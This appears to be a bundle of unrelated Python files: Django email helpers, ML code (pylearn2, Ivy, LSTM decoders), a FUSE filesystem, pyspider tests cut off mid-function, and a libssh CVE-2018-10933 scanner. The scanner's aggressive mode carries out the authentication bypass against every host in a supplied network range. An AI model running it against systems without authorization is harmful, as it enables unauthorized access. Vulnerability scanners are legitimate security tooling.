msg.attach_alternative(html_content, "text/html")
ok = msg.send(fail_silently=True)
if not ok:
print(f"Error Occurred in Sending Email to {to}")
return False
return True
def send_massenergize_mass_email(subject, msg, recipient_emails):
ok = send_mail(
subject,
msg,
FROM_EMAIL, #from
recipient_list=recipient_emails,
fail_silently=True,
)
if not ok:
print(f"Error occurred in sending some emails")
return False
print(f"{ok} sent emails")
return True |
"""
Test autoencoder sparse activation cost.
"""
from pylearn2.config import yaml_parse
def test_sparse_activation():
"""Test autoencoder sparse activation cost."""
trainer = yaml_parse.load(test_yaml)
trainer.main_loop()
test_yaml = """
!obj:pylearn2.train.Train {
dataset: &train
!obj:pylearn2.testing.datasets.random_one_hot_dense_design_matrix
{
rng: !obj:numpy.random.RandomState { seed: 1 },
num_examples: 10,
dim: 5,
num_classes: 2,
},
model: !obj:pylearn2.models.autoencoder.Autoencoder {
nvis: 5,
nhid: 10,
act_enc: sigmoid,
act_dec: linear,
},
algorithm: !obj:pylearn2.training_algorithms.bgd.BGD {
batch_size: 5,
line_search_mode: exhaustive,
conjugate: 1,
cost: !obj:pylearn2.costs.cost.SumOfCosts {
costs: [
!obj:pylearn2.costs.autoencoder.MeanSquaredReconstructionError {
},
!obj:pylearn2.costs.autoencoder.SparseActivation {
coeff: 0.5,
p: 0.2,
},
],
},
monitoring_dataset: {
'train': *train,
},
termination_criterion: !obj:pylearn2.termination_criteria.EpochCounter
{
max_epochs: 1,
},
},
}
"""
|
#!/usr/bin/env python2
# CVE-2018-10933 Scanner by Leap Security (@LeapSecurity) https://leapsecurity.io
import socket, argparse, sys, os, paramiko, ipaddress
from six import text_type
VERSION = "1.0.4"
class colors(object):
blue = "\033[1;34m"
normal = "\033[0;00m"
red = "\033[1;31m"
yellow = "\033[1;33m"
def pstatus(ip, port, banner):
print("{blue}[*]{white} {ipaddr}:{port} is not vulnerable to authentication bypass ({banner})".format(blue=colors.blue, white=colors.normal, ipaddr=ip, port=port, banner=banner.strip()))
def ptimeout(ip, port):
print("{red}[-]{white} {ipaddr}:{port} has timed out.".format(red=colors.red, white=colors.normal, ipaddr=ip, port=port))
def ppatch(ip, port, banner):
print("{blue}[*]{white} {ipaddr}:{port} has been patched ({banner})".format(blue=colors.blue, white=colors.normal, ipaddr=ip, port=port, banner=banner.strip()))
def pvulnerable(ip, port, banner):
print("{yellow}[!]{white} {ipaddr}:{port} is likely VULNERABLE to authentication bypass ({banner})".format(yellow=colors.yellow, white=colors.normal, ipaddr=ip, port=port, banner=banner.strip()))
def pexception(ip, port, banner):
print("{red}[-]{white} {ipaddr}:{port} has encountered an exception ({banner}).".format(red=colors.red, white=colors.normal, ipaddr=ip, port=port, banner=banner.strip()))
def passive(ip, port): #banner grab to verify vulnerable host
try:
s = socket.create_connection((ip, port), timeout=0.50000)
s.settimeout(None)
banner = s.recv(1024)
s.close()
return banner.split("\n")[0]
except (socket.timeout, socket.error) as e:
ptimeout(ip, port)
return ""
def aggressive(ip, port, banner): #bypass auth to verify vulnerable host
try:
s = socket.create_connection((ip, port), timeout=0.50000)
s.settimeout(None)
msg = paramiko.message.Message()
t = paramiko.transport.Transport(s)
t.start_client()
msg.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
t._send_message(msg)
c = t.open_session(timeout=0.50000)
s.close()
pvulnerable(ip, port, banner)
except (socket.timeout, socket.error) as e:
ptimeout(ip, port)
except paramiko.SSHException as e:
pstatus(ip, port, banner)
#print e
except Exception as e:
pexception(ip, port, banner)
parser = argparse.ArgumentParser(description='libssh Scanner - Find vulnerable libssh services by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="An ip address (network) or new line delimited file containing IPs to banner grab for the vulnerability.")
parser.add_argument("-V", "--version", action="version", help="Show version and exit", default=VERSION)
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
parser.add_argument("-a", "--aggressive", action="store_true", help="Identify vulnerable hosts by bypassing authentication")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
ips, results = [], []
print("\nlibssh scanner {}\n".format(VERSION))
if os.path.isfile(args.target): #if file add hosts
with open (args.target) as f:
for line in f.readlines():
ips.append(line.strip())
else: #if not scan the provided IP
network = ipaddress.ip_network(text_type(args.target.strip()))
for ip in network:
ips.append(str(ip))
print("Searching for Vulnerable Hosts...\n")
if args.aggressive:
paramiko.util.log_to_file("paramiko.log")
for ip in ips:
aggressive(ip, int(args.port), passive(ip, int(args.port)))
else: #banner grab
for ip in ips:
banner = passive(ip, int(args.port)) #banner
if banner:
if any(version in banner for version in [b"libssh-0.6", b"libssh_0.6"]): #vulnerable
pvulnerable(ip, args.port, banner)
elif any(version in banner for version in [b"libssh-0.7", b"libssh_0.7"]):
if int(banner.split(".")[-1]) >= 6: #libssh is 0.7.6 or greater (patched)
ppatch(ip, args.port, banner)
else: #vulnerable
pvulnerable(ip, args.port, banner)
elif any(version in banner for version in [b"libssh-0.8", b"libssh_0.8"]):
if int(banner.split(".")[-1]) >= 4: #libssh is 0.8.4 or greater (patched)
ppatch(ip, args.port, banner)
else: #vulnerable
pvulnerable(ip, args.port, banner)
else: #not vulnerable
pstatus(ip, args.port, banner)
print("\nScanner Completed Successfully\n")
|
# Generated by Django 3.0.3 on 2020-02-18 15:01
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('console', '0006_auto_20200218_1601'),
]
operations = [
migrations.AlterField(
model_name='timeentry',
name='start',
field=models.DateTimeField(),
),
]
|
import cv2
import threading
#from tf_pose_estimation.run_v3 import PoseEstimator
class VideoCamera(object):
def __init__(self):
self.video = cv2.VideoCapture(0)
(self.grabbed, self.frame) = self.video.read()
self.stopped = False
#self.estimator = PoseEstimator()
#def _configure(self):
# self.estimator.configure()
def __del__(self):
self.video.release()
def start(self):
video_thread = threading.Thread(target=self.update)
video_thread.daemon = True
video_thread.start()
return self
def update(self):
print("read")
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.video.read()
def read(self):
img = cv2.resize(self.frame, (576, 432))
img = cv2.flip( img, 1)
#img = estimator.aruco_tracking(img, estimator.mtx, estimator.dist, None)
return img
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
'''
def get_frame(self, estimator):
success, image = self.video.read()
img = cv2.resize(image, (432, 384))
img = cv2.flip( img, 1)
img = estimator.predict(img)
ret, jpeg = cv2.imencode('.jpg', img)
return jpeg.tobytes()
''' |
"""
Database
Initialize and create connection control flow for database.
Datase parameters must be set in config.py or directly in app.py
"""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from contextlib import contextmanager
from models import *
import click
from flask import current_app, g
from flask.cli import with_appcontext
import logging
def get_db():
"""
Returns current database connection. If connection not present,
initiates connection to configured database. Default is non-authenticated SQL.
Modifty g.db = *connect to match intended database connection.
"""
db_logger = logging.getLogger(__name__ + '.getdb')
if 'db' not in g:
db_logger.info('DB connection not found. Attempting connection to {}.'.format(current_app.config['DATABASE_URI']))
try:
g.engine = create_engine(current_app.config['DATABASE_URI'])
g.db = g.engine.connect()
except:
db_logger.error('Could not establish connection. Aborting.')
raise ConnectionError
return g.db
@contextmanager
def get_session():
# Setup session with thread engine.
# Allows for usage: with get_session() as session: session...
engine = get_db()
session = scoped_session(sessionmaker(bind=engine))
try:
yield session
finally:
session.close()
def close_db(e=None):
db = g.pop('db', None)
engine = g.pop('engine', None)
if db is not None:
db.close()
engine.dispose()
def init_db():
db = get_db()
Base.metadata.create_all(db)
@click.command('init-db')
@with_appcontext
def init_db_command():
"""Create tables from models.py"""
init_db()
click.echo('Initialized the database')
def init_app(app):
app.teardown_appcontext(close_db)
app.cli.add_command(init_db_command)
|
import sys
import json
import urllib.request
import time
print( "usage python .\\6removeoldscrape.py data.json outfile.json" )
url_start = "http://store.steampowered.com/api/appdetails?appids="
with open(sys.argv[1], 'r') as json_data:
data = json.load(json_data)
for item in list(data):
appid = data[item]["appid"]
print(appid)
time.sleep(1)
request = urllib.request.Request(url_start + appid)
with urllib.request.urlopen(request) as response:
url_data = response.read().decode("utf-8")
while( url_data == "null" or url_data == "" ):
time.sleep(60)
request = urllib.request.Request(url_start + appid)
with urllib.request.urlopen(request) as response:
url_data = response.read().decode("utf-8")
print( "retrying" )
colon = url_data.find(':')
url_data = url_data[colon+1:-1]
json_data = json.loads(url_data)
if (json_data["success"] == False) :
print("removed")
data.pop(item)
with open(sys.argv[2], 'w') as outfile:
json.dump(data, outfile, separators=(',', ':'))
|
from stat import S_IFDIR, S_IFLNK, S_IFREG
from typing import Dict, Iterable
import aiohttp
from io import BytesIO
import os
from .types import *
from .core import *
from . import types_conv
class BaseFile(Node):
def __init__(self, mode: int = 0o444) -> None:
self.mode = mode & 0o777
async def getattr(self) -> Stat:
return Stat(
st_mode=S_IFREG | self.mode
)
class BaseDir(Node):
def __init__(self, mode: int = 0o555) -> None:
self.mode = mode & 0o777
async def getattr(self) -> Stat:
return Stat(
st_mode=S_IFDIR | self.mode
)
class BaseSymlink(Node):
def __init__(self, mode: int = 0o444) -> None:
self.mode = mode & 0o777
async def getattr(self) -> Stat:
return Stat(
st_mode=S_IFLNK | self.mode
)
class Symlink(BaseSymlink):
def __init__(self, link: str, mode: int = 0o444) -> None:
super().__init__(mode)
self.link = link
async def readlink(self) -> str:
return self.link
class BlobFile(BaseFile):
def __init__(self, data: bytes = b'', mode: int = None, rw: bool = False) -> None:
super().__init__(mode if mode is not None else 0o666 if rw else 0o444)
self.rw = rw
self.data = data
self.shared_handle = None
async def load(self) -> bytes:
return self.data
async def save(self, data: bytes) -> None:
self.data = data
async def open(self, mode: int) -> FileHandle:
if self.shared_handle is None:
self.shared_handle = BlobFile.Handle(self, await self.load())
self.shared_handle.refs += 1
return self.shared_handle
async def getattr(self) -> Stat:
if self.shared_handle is not None:
size = len(self.shared_handle.buffer.getvalue())
else:
size=len(self.data)
return Stat(
st_mode=S_IFREG | self.mode,
st_size=size
)
async def truncate(self, size: int) -> None:
handle = await self.open(os.O_RDWR)
try:
await handle.truncate(size)
finally:
await handle.release()
class Handle(FileHandle):
def __init__(self, node: Node, data: bytes) -> None:
super().__init__(node)
self.buffer = BytesIO(data)
self.dirty = False
self.refs = 0
async def read(self, size: int, offset: int) -> bytes:
self.buffer.seek(offset)
return self.buffer.read(size)
async def write(self, buffer, offset):
if not self.node.rw:
raise fuse.FuseOSError(errno.EPERM)
self.dirty = True
self.buffer.seek(offset)
self.buffer.write(buffer)
return len(buffer)
async def truncate(self, size: int) -> None:
if not self.node.rw:
raise fuse.FuseOSError(errno.EPERM)
self.dirty = True
self.buffer.truncate(size)
async def flush(self) -> None:
if self.dirty:
await self.node.save(self.buffer.getvalue())
self.dirty = None
async def release(self) -> None:
self.refs -= 1
if self.refs == 0:
await self.flush()
self.node.shared_handle = None
class GeneratorFile(BaseFile):
def __init__(self, generator: Iterable[Bytes_Like], mode: int = 0o444, min_read_len: int = -1) -> None:
super().__init__(mode)
self.generator = generator
self.min_read_len = min_read_len
async def open(self, mode: int) -> FileHandle:
return GeneratorFile.Handle(self, self.generator, self.min_read_len)
class Handle(FileHandle):
def __init__(self, node: Node, generator: Iterable[Bytes_Like], min_read_len: int = -1) -> None:
super().__init__(node, direct_io=True, nonseekable=True)
self.generator = self.as_generator(generator)
self.current_blob = b''
self.current_blob_position = 0
self.min_read_len = min_read_len
async def read(self, size: int, offset: int) -> bytes:
ret = b''
while size > len(ret) and self.current_blob is not None:
n = min(size - len(ret), len(self.current_blob) - self.current_blob_position)
if n > 0:
ret += self.current_blob[self.current_blob_position : self.current_blob_position + n]
self.current_blob_position += n
else:
try:
self.current_blob = types_conv.as_bytes(await self.generator.__anext__())
except StopAsyncIteration:
self.current_blob = None
self.current_blob_position = 0
if self.min_read_len > 0 and len(ret) >= self.min_read_len:
break
return ret
def as_generator(self, generator):
async def as_async_gen(data):
for x in data:
yield x
if hasattr(generator, '__anext__'):
return generator
elif hasattr(generator, '__aiter__'):
return generator.__aiter__()
elif hasattr(generator, '__next__'):
return as_async_gen(generator)
elif hasattr(generator, '__iter__'):
return as_async_gen(iter(generator))
elif callable(generator):
return self.as_generator(generator())
raise TypeError('Expected iterator, iterable, async iterator, async iterable or callable')
def generatorfile(func):
def tmp(*args, **kwargs):
return GeneratorFile(lambda: func(*args, **kwargs))
return tmp
class HttpFile(BaseFile):
def __init__(self, url: str, mode: int = 0o444) -> None:
super().__init__(mode)
self.url = url
async def open(self, mode: int) -> FileHandle:
session = await aiohttp.ClientSession().__aenter__()
response = await (await session.get(self.url)).__aenter__()
return HttpFile.Handle(self, session, response)
class Handle(FileHandle):
def __init__(self, node: Node, session, response) -> None:
super().__init__(node, direct_io=True, nonseekable=True)
self.session = session
self.response = response
async def read(self, size: int, offset: int) -> bytes:
return await self.response.content.read(size)
async def release(self) -> None:
await self.response.__aexit__(None, None, None)
await self.session.__aexit__(None, None, None)
class DictDir(BaseDir):
def __init__(self, contents: Dict[str, Node_Like], mode: int = None, rw: bool = False) -> None:
super().__init__(mode if mode is not None else 0o777 if rw else 0o555)
self.rw = rw
self.contents = contents
# ====== RO operations ======
async def lookup(self, name: str) -> Node_Like:
return self.contents.get(name, None)
async def opendir(self) -> DirHandle_Like:
return DictDir.Handle(self, self.contents.keys())
class Handle(DirHandle):
def __init__(self, node: Node, items: Iterable[DirEntry]) -> None:
super().__init__(node)
self.items = items
async def readdir(self) -> Iterable[DirEntry]:
for item in self.items:
yield item
# ====== RW operations ======
async def mknod(self, name: str, mode: int, dev: int) -> Node_Like:
if not self.rw:
raise fuse.FuseOSError(errno.EPERM)
if dev != 0:
raise fuse.FuseOSError(errno.ENOSYS)
new_file = BlobFile(b'', mode, rw=True)
self.contents[name] = new_file
return new_file
async def mkdir(self, name: str, mode: int) -> Node_Like:
if not self.rw:
raise fuse.FuseOSError(errno.EPERM)
new_dir = DictDir({}, mode, rw=True)
self.contents[name] = new_dir
return new_dir
async def unlink(self, name: str) -> None:
if not self.rw:
raise fuse.FuseOSError(errno.EPERM)
del self.contents[name]
async def rmdir(self, name: str) -> None:
if not self.rw:
raise fuse.FuseOSError(errno.EPERM)
del self.contents[name]
async def symlink(self, name: str, target: str) -> Node_Like:
if not self.rw:
raise fuse.FuseOSError(errno.EPERM)
new_link = Symlink(target)
self.contents[name] = new_link
async def rename(self, old_name: str, new_parent: Node, new_name: str) -> None:
if not isinstance(new_parent, DictDir):
raise fuse.FuseOSError(errno.ENOSYS)
if not self.rw or not new_parent.rw:
raise fuse.FuseOSError(errno.EPERM)
node = self.contents[name]
del self.contents[name]
new_parent.contents[name] = node
async def link(self, name: str, node: Node) -> Node_Like:
self.contents[name] = node
|
import re
texto ='''
===t1
<h1>{{v1}}</h1>
{{L1,T2}}
===T2
viva o Salgueiros
'''
def compilaTemplates(txt):
texto_Separado = re.split(r'===',texto)
#Deitar fora o primeiro bocado do split pois e inutil
texto_Separado.pop(0)
for t in texto_Separado:
t = re.sub(r'(\w+)(.+)',r"def \1(d): return '''\2''' ",t,flags=re.S)
#Executar as funcoes
exec(t,globals())
compilaTemplates(texto)
print(t1(7)) |
"""
Collection of PyTorch general functions, wrapped to fit Ivy syntax and signature.
"""
# global
import ivy
import numpy as np
torch_scatter = None
import math as _math
import torch as torch
from operator import mul
from torch.types import Number
from functools import reduce as _reduce
from typing import List, Dict, Optional, Union
# local
from ivy.functional.ivy import default_dtype
from ivy.functional.ivy.device import default_device
from ivy.functional.backends.torch.device import dev_from_str, _callable_dev
# API #
# ----#
def dtype_bits(dtype_in):
dtype_str = dtype_to_str(dtype_in)
if 'bool' in dtype_str:
return 1
return int(dtype_str.replace('torch.', '').replace('uint', '').replace('int', '').replace('bfloat', '').replace(
'float', ''))
def shape(x, as_tensor=False) -> Union[torch.Tensor, List[int]]:
return torch.tensor(x.shape) if as_tensor else x.shape
def get_num_dims(x, as_tensor=False) -> Union[torch.Tensor, int]:
return torch.tensor(len(x.shape)) if as_tensor else len(x.shape)
def minimum(x, y):
x_val = torch.tensor(x) if (isinstance(x, int) or isinstance(x, float)) else x
y_val = torch.tensor(y) if (isinstance(y, int) or isinstance(y, float)) else y
return torch.min(x_val, y_val)
def maximum(x, y):
x_val = torch.tensor(x) if (isinstance(x, int) or isinstance(x, float)) else x
y_val = torch.tensor(y) if (isinstance(y, int) or isinstance(y, float)) else y
return torch.max(x_val, y_val)
def clip(x, x_min, x_max):
return torch.clamp(x, x_min, x_max)
def cast(x, dtype_in: str):
dtype_val = dtype_from_str(dtype_in)
return x.type(dtype_val)
astype = cast
# noinspection PyShadowingNames
def arange(stop: Number, start: Number = 0, step: Number = 1, dtype: Optional[str] = None,
dev: Optional[str] = None):
dev = default_device(dev)
if dtype is not None:
return torch.arange(start, stop, step=step, dtype=dtype_from_str(dtype), device=dev_from_str(dev))
else:
return torch.arange(start, stop, step=step, device=dev_from_str(dev))
def concatenate(xs: List[torch.Tensor], axis: int = -1):
if xs[0].shape == ():
return torch.cat([x.unsqueeze(0) for x in xs], axis)
return torch.cat(xs, axis)
def stack(xs: List[torch.Tensor], axis: int = 0):
return torch.stack(xs, axis)
def transpose(x, axes: List[int]):
if axes is None:
num_dims = len(x.shape)
axes = list(range(num_dims))
axes.reverse()
return x.permute(axes)
def where(condition, x1, x2):
return torch.where(condition.type(torch.bool), x1, x2)
def reshape(x, newshape: List[int]):
if isinstance(newshape, int):
newshape = [newshape]
return torch.reshape(x, newshape)
def broadcast_to(x, new_shape):
return x.expand(new_shape)
# noinspection PyShadowingNames
def zeros_like(x, dtype: Optional[str] = None, dev: Optional[str] = None):
if dev is None:
dev = _callable_dev(x)
if dtype is not None:
type_dict: Dict[str, torch.dtype] = {'int8': torch.int8,
'int16': torch.int16,
'int32': torch.int32,
'int64': torch.int64,
'uint8': torch.uint8,
'bfloat16': torch.bfloat16,
'float16': torch.float16,
'float32': torch.float32,
'float64': torch.float64,
'bool': torch.bool}
return torch.zeros_like(x, dtype=type_dict[dtype], device=dev_from_str(dev))
return torch.zeros_like(x, device=dev_from_str(dev))
def full(shape, fill_value, dtype=None, device=None):
return torch.full(
ivy.shape_to_tuple(shape), fill_value, dtype=dtype_from_str(default_dtype(dtype, fill_value)),
device=default_device(device))
def cross(x1, x2):
return torch.cross(x1, x2)
# noinspection PyShadowingNames
def identity(n: int, dtype: ivy.Dtype = 'float32', batch_shape: Optional[List[int]] = None,
dev: Optional[str] = None):
dev = default_device(dev)
type_dict: Dict[str, torch.dtype] = {'int8': torch.int8,
'int16': torch.int16,
'int32': torch.int32,
'int64': torch.int64,
'uint8': torch.uint8,
'bfloat16': torch.bfloat16,
'float16': torch.float16,
'float32': torch.float32,
'float64': torch.float64,
'bool': torch.bool}
dtype_val: torch.dtype = type_dict[dtype]
mat = torch.eye(n, n, dtype=dtype_val, device=dev_from_str(dev))
if batch_shape is None:
return mat
else:
reshape_dims = [1] * len(batch_shape) + [n, n]
tile_dims = list(batch_shape) + [1, 1]
res = torch.reshape(mat, reshape_dims).repeat(tile_dims)
return res
def meshgrid(*xs, indexing='ij'):
ret = torch.meshgrid(*xs)
if indexing == 'xy':
# ToDo: verify if this is correct
return tuple([torch.transpose(x, 1, 0) for x in ret])
return ret
def dtype(x, as_str=False):
dt = x.dtype
if as_str:
return dtype_to_str(dt)
return dt
def dtype_to_str(dtype_in):
if isinstance(dtype_in, str):
return dtype_in
return {torch.int8: 'int8',
torch.int16: 'int16',
torch.int32: 'int32',
torch.int64: 'int64',
torch.uint8: 'uint8',
torch.bfloat16: 'bfloat16',
torch.float16: 'float16',
torch.float32: 'float32',
torch.float64: 'float64',
torch.bool: 'bool'}[dtype_in]
def dtype_from_str(dtype_in: str) -> torch.dtype:
if not isinstance(dtype_in, str):
return dtype_in
return {'int8': torch.int8,
'int16': torch.int16,
'int32': torch.int32,
'int64': torch.int64,
'uint8': torch.uint8,
'bfloat16': torch.bfloat16,
'float16': torch.float16,
'float32': torch.float32,
'float64': torch.float64,
'bool': torch.bool}[dtype_in]
def compile(fn, dynamic=True, example_inputs=None, static_argnums=None, static_argnames=None):
if dynamic:
return torch.jit.script(fn)
return torch.jit.trace(fn, example_inputs)
def current_framework_str():
return 'torch'
|
# Copyright (c) Facebook, Inc. and its affiliates.
import torch
import torch.nn as nn
import torch.nn.functional as F
import random
class DecoderStep(nn.Module):
def __init__(self, input_dim, output_dim, hidden_dim, lstm=None):
super(DecoderStep, self).__init__()
self.lstm = (
nn.LSTM(input_size=input_dim, hidden_size=hidden_dim)
if not lstm
else lstm
)
self.out = nn.Linear(hidden_dim, output_dim)
def forward(self, input, hidden=None, cell=None, encoder_outputs=None):
if (hidden is None) and (cell is None):
output, (hidden, cell) = self.lstm(input)
else:
output, (hidden, cell) = self.lstm(input, (hidden, cell))
output = output.squeeze(0)
output = self.out(output)
return output, hidden, cell
class LSTMDecoder(nn.Module):
"""Decoder to generate sequences using LSTM cells. Decoding is done in a
greedy manner without attention mechanism.
Attributes:
input_dim: Size of input vector
output_dim: Size of output to be generated at each time step
hidden_dim: Size of hidden state vector
device: Optional; Device to be used "cuda" or "cpu"
lstm: Optional; If provided, the lstm cell will be used in the decoder.
This is useful for sharing lstm parameters from encoder.
"""
def __init__(
self, input_dim, output_dim, hidden_dim, device="cuda", lstm=None
):
super(LSTMDecoder, self).__init__()
self.input_dim = input_dim
self.decoder_step = DecoderStep(
input_dim=input_dim,
output_dim=output_dim,
hidden_dim=hidden_dim,
lstm=lstm,
)
self.device = device
def forward(
self,
tgt,
hidden=None,
cell=None,
max_len=None,
teacher_forcing_ratio=0.5,
):
"""
Inputs:
tgt: Target sequence provided as input to the decoder. During
training, provide reference target sequence. For inference,
provide only last frame of source.
Expected shape: (seq_len, batch_size, input_dim)
hidden, cell: Hidden state and cell state to be used in LSTM cell
max_len: Optional; Length of sequence to be generated. By default,
the decoder generates sequence with same length as `tgt`
(training).
teacher_forcing_ratio: Probability of feeding gold target pose as
decoder input instead of predicted pose from previous time step
"""
tgt = tgt.transpose(0, 1)
max_len = max_len if max_len is not None else tgt.shape[0]
batch_size = tgt.shape[1]
input = tgt[0, :]
outputs = torch.zeros(max_len, batch_size, self.input_dim,).to(
self.device
)
for t in range(max_len):
input = input.unsqueeze(0)
output, hidden, cell = self.decoder_step(input, hidden, cell)
outputs[t] = output
teacher_force = random.random() < teacher_forcing_ratio
input = tgt[t] if teacher_force else output
outputs = outputs.transpose(0, 1)
return outputs
class DecoderStepWithAttention(nn.Module):
def __init__(
self, input_dim, output_dim, hidden_dim, source_length, device="cuda",
):
super(DecoderStepWithAttention, self).__init__()
self.input_dim = input_dim
self.hidden_dim = hidden_dim
self.output_dim = output_dim
self.source_length = source_length
self.device = device
self.attn = nn.Linear(
self.hidden_dim + self.input_dim, self.source_length,
)
self.attn_combine = nn.Linear(
self.hidden_dim + self.input_dim, self.input_dim,
)
self.lstm = nn.LSTM(input_size=input_dim, hidden_size=hidden_dim)
self.out = nn.Linear(self.hidden_dim, self.output_dim)
def forward(self, input, hidden, cell, encoder_outputs):
attn_weights = F.softmax(
self.attn(torch.cat((input, hidden), 2)), dim=2,
)
attn_applied = torch.bmm(attn_weights.transpose(0, 1), encoder_outputs)
output = torch.cat((input, attn_applied.transpose(0, 1)), 2)
output = self.attn_combine(output)
output = F.relu(output)
if (hidden is None) and (cell is None):
output, (hidden, cell) = self.lstm(output)
else:
output, (hidden, cell) = self.lstm(output, (hidden, cell))
output = output.squeeze(0)
output = self.out(output)
return output, hidden, cell
class LSTMDecoderWithAttention(LSTMDecoder):
def __init__(
self,
input_dim,
output_dim,
max_source_length,
hidden_dim=128,
device="cuda",
):
"""Extension of LSTMDecoder that uses attention mechanism to generate
sequences.
Attributes:
input_dim: Size of input vector
output_dim: Size of output to be generated at each time step
max_source_length: Length of source sequence
hidden_dim: Size of hidden state vector
device: Optional; Device to be used "cuda" or "cpu"
"""
super(LSTMDecoderWithAttention, self).__init__(
input_dim, output_dim, hidden_dim, device
)
self.decoder_step = DecoderStepWithAttention(
input_dim, output_dim, hidden_dim, max_source_length
)
self.device = device
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-22 14:00:05
import os
import copy
import time
import unittest2 as unittest
import logging.config
logging.config.fileConfig("pyspider/logging.conf")
from pyspider.libs import utils
from pyspider.processor.project_module import ProjectManager
class TestProjectModule(unittest.TestCase):
base_task = {
'taskid': 'taskid',
'project': 'test.project',
'url': 'www.baidu.com/',
'schedule': {
'priority': 1,
'retries': 3,
'exetime': 0,
'age': 3600,
'itag': 'itag',
'recrawl': 5,
},
'fetch': {
'method': 'GET',
'headers': {
'Cookie': 'a=b',
},
'data': 'a=b&c=d',
'timeout': 60,
'save': [1, 2, 3],
},
'process': {
'callback': 'callback',
},
}
fetch_result = {
'status_code': 200,
'orig_url': 'www.baidu.com/',
'url': 'http://www.baidu.com/',
'headers': {
'cookie': 'abc',
},
'content': 'test data',
'cookies': {
'a': 'b',
},
'save': [1, 2, 3],
}
def setUp(self):
self.project = "test.project"
self.script = open(os.path.join(os.path.dirname(__file__), 'data_handler.py')).read()
self.env = {
'test': True,
}
self.project_info = {
'name': self.project,
'status': 'DEBUG',
}
data = ProjectManager.build_module({
'name': self.project,
'script': self.script
}, {'test': True})
self.module = data['module']
self.instance = data['instance']
def test_2_hello(self):
self.base_task['process']['callback'] = 'hello'
ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
self.assertIsNone(ret.exception)
self.assertEqual(ret.result, "hello world!")
def test_3_echo(self):
self.base_task['process']['callback'] = 'echo'
ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
self.assertIsNone(ret.exception)
self.assertEqual(ret.result, "test data")
def test_4_saved(self):
self.base_task['process']['callback'] = 'saved'
ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
self.assertIsNone(ret.exception)
self.assertEqual(ret.result, self.base_task['fetch']['save'])
def test_5_echo_task(self):
self.base_task['process']['callback'] = 'echo_task'
ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
self.assertIsNone(ret.exception)
self.assertEqual(ret.result, self.project)
def test_6_catch_status_code(self):
self.fetch_result['status_code'] = 403
self.base_task['process']['callback'] = 'catch_status_code'
ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
self.assertIsNone(ret.exception)
self.assertEqual(ret.result, 403)
self.fetch_result['status_code'] = 200
def test_7_raise_exception(self):
self.base_task['process']['callback'] = 'raise_exception'
ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
self.assertIsNotNone(ret.exception)
logstr = ret.logstr()
self.assertIn('info', logstr)
self.assertIn('warning', logstr)
self.assertIn('error', logstr)
def test_8_add_task(self):
self.base_task['process']['callback'] = 'add_task'
ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
self.assertIsNone(ret.exception, ret.logstr())
self.assertEqual(len(ret.follows), 1)
self.assertEqual(len(ret.messages), 1)
def test_10_cronjob(self):
task = {
'taskid': '_on_cronjob',
'project': self.project,
'url': 'data:,_on_cronjob',
'fetch': {
'save': {
'tick': 11,
},
},
'process': {
'callback': '_on_cronjob',
},
}
fetch_result = copy.deepcopy(self.fetch_result)
fetch_result['save'] = {
'tick': 11,
}
ret = self.instance.run_task(self.module, task, fetch_result)
logstr = ret.logstr()
self.assertNotIn('on_cronjob1', logstr)
self.assertNotIn('on_cronjob2', logstr)
task['fetch']['save']['tick'] = 10
fetch_result['save'] = task['fetch']['save']
ret = self.instance.run_task(self.module, task, fetch_result)
logstr = ret.logstr()
self.assertNotIn('on_cronjob1', logstr)
self.assertIn('on_cronjob2', logstr)
task['fetch']['save']['tick'] = 60
fetch_result['save'] = task['fetch']['save']
ret = self.instance.run_task(self.module, task, fetch_result)
logstr = ret.logstr()
self.assertIn('on_cronjob1', logstr)
self.assertIn('on_cronjob2', logstr)
def test_20_get_info(self):
task = {
'taskid': '_on_get_info',
'project': self.project,
'url': 'data:,_on_get_info',
'fetch': {
'save': ['min_tick', ],
},
'process': {
'callback': '_on_get_info',
},
}
fetch_result = copy.deepcopy(self.fetch_result)
fetch_result['save'] = task['fetch']['save']
ret = self.instance.run_task(self.module, task, fetch_result)
self.assertEqual(len(ret.follows), 1, ret.logstr())
for each in ret.follows:
self.assertEqual(each['url'], 'data:,on_get_info')
self.assertEqual(each['fetch']['save']['min_tick'], 10)
def test_30_generator(self):
self.base_task['process']['callback'] = 'generator'
ret = self.instance.run_task(self.module, self.base_task, self.fetch_result)
self.assertIsNone(ret.exception)
self.assertIn('generator object', repr(ret.result))
import shutil
import inspect
from multiprocessing import Queue
from pyspider.database.sqlite import projectdb
from pyspider.processor.processor import Processor
from pyspider.libs.utils import run_in_thread
from pyspider.libs import sample_handler
class TestProcessor(unittest.TestCase):
projectdb_path = './data/tests/project.db'
@classmethod
def setUpClass(self):
shutil.rmtree('./data/tests/', ignore_errors=True)
os.makedirs('./data/tests/')
def get_projectdb():
return projectdb.ProjectDB(self.projectdb_path)
self.projectdb = get_projectdb()
self.in_queue = Queue(10)
self.status_queue = Queue(10)
self.newtask_queue = Queue(10)
self.result_queue = Queue(10)
def run_processor():
self.processor = Processor(get_projectdb(), self.in_queue,
self.status_queue, self.newtask_queue, self.result_queue)
self.processor.project_manager.CHECK_PROJECTS_INTERVAL = 0.1
self.processor.run()
self.process = run_in_thread(run_processor)
time.sleep(1)
@classmethod
def tearDownClass(self):
if self.process.is_alive():
self.processor.quit()
self.process.join(2)
assert not self.process.is_alive()
shutil.rmtree('./data/tests/', ignore_errors=True)
def test_10_update_project(self):
